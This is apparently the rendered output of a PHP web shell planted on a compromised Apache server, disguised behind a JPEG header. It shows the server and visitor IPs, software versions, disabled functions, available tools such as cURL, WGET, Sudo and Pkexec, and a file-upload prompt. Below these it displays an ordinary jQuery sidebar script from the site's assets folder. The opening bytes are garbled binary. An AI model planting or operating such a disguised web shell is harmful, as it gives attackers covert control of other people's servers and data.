����JFIF��H�H����Exif��MM�*���� ��3����V�����3������3�(��������������������3�����
Server IP : 74.208.127.88 / Your IP : 216.73.216.68 Web Server : Apache/2.4.41 (Ubuntu) System : Linux ubuntu 5.4.0-163-generic #180-Ubuntu SMP Tue Sep 5 13:21:23 UTC 2023 x86_64 User : www-data ( 33) PHP Version : 7.4.3-4ubuntu2.29 Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare, MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : ON Directory : /proc/self/root/proc/thread-self/root/var/www/html/rockyo/assets/js/ |
Upload File : |
/*---LEFT BAR ACCORDION----*/ $(function() { $('#nav-accordion').dcAccordion({ eventType: 'click', autoClose: true, saveState: true, disableLink: true, speed: 'slow', showCount: false, autoExpand: true, // cookie: 'dcjq-accordion-1', classExpand: 'dcjq-current-parent' }); }); var Script = function () { // sidebar dropdown menu auto scrolling jQuery('#sidebar .sub-menu > a').click(function () { var o = ($(this).offset()); diff = 250 - o.top; if(diff>0) $("#sidebar").scrollTo("-="+Math.abs(diff),500); else $("#sidebar").scrollTo("+="+Math.abs(diff),500); }); // sidebar toggle $(function() { function responsiveView() { var wSize = $(window).width(); if (wSize <= 768) { $('#container').addClass('sidebar-close'); $('#sidebar > ul').hide(); } if (wSize > 768) { $('#container').removeClass('sidebar-close'); $('#sidebar > ul').show(); } } $(window).on('load', responsiveView); $(window).on('resize', responsiveView); }); $('.fa-bars').click(function () { if ($('#sidebar > ul').is(":visible") === true) { $('#main-content').css({ 'margin-left': '0px' }); $('#sidebar').css({ 'margin-left': '-210px' }); $('#sidebar > ul').hide(); $("#container").addClass("sidebar-closed"); } else { $('#main-content').css({ 'margin-left': '210px' }); $('#sidebar > ul').show(); $('#sidebar').css({ 'margin-left': '0' }); $("#container").removeClass("sidebar-closed"); } }); // custom scrollbar $("#sidebar").niceScroll({styler:"fb",cursorcolor:"#4ECDC4", cursorwidth: '3', cursorborderradius: '10px', background: '#404040', spacebarenabled:false, cursorborder: ''}); $("html").niceScroll({styler:"fb",cursorcolor:"#4ECDC4", cursorwidth: '6', cursorborderradius: '10px', background: '#404040', spacebarenabled:false, cursorborder: '', zindex: '1000'}); // widget tools jQuery('.panel .tools .fa-chevron-down').click(function () { var el = jQuery(this).parents(".panel").children(".panel-body"); if (jQuery(this).hasClass("fa-chevron-down")) { jQuery(this).removeClass("fa-chevron-down").addClass("fa-chevron-up"); el.slideUp(200); } else { jQuery(this).removeClass("fa-chevron-up").addClass("fa-chevron-down"); el.slideDown(200); } }); jQuery('.panel .tools .fa-times').click(function () { jQuery(this).parents(".panel").parent().remove(); }); // tool tips $('.tooltips').tooltip(); // popovers $('.popovers').popover(); // custom bar chart if ($(".custom-bar-chart")) { $(".bar").each(function () { var i = $(this).find(".value").html(); $(this).find(".value").html(""); $(this).find(".value").animate({ height: i }, 2000) }) } }();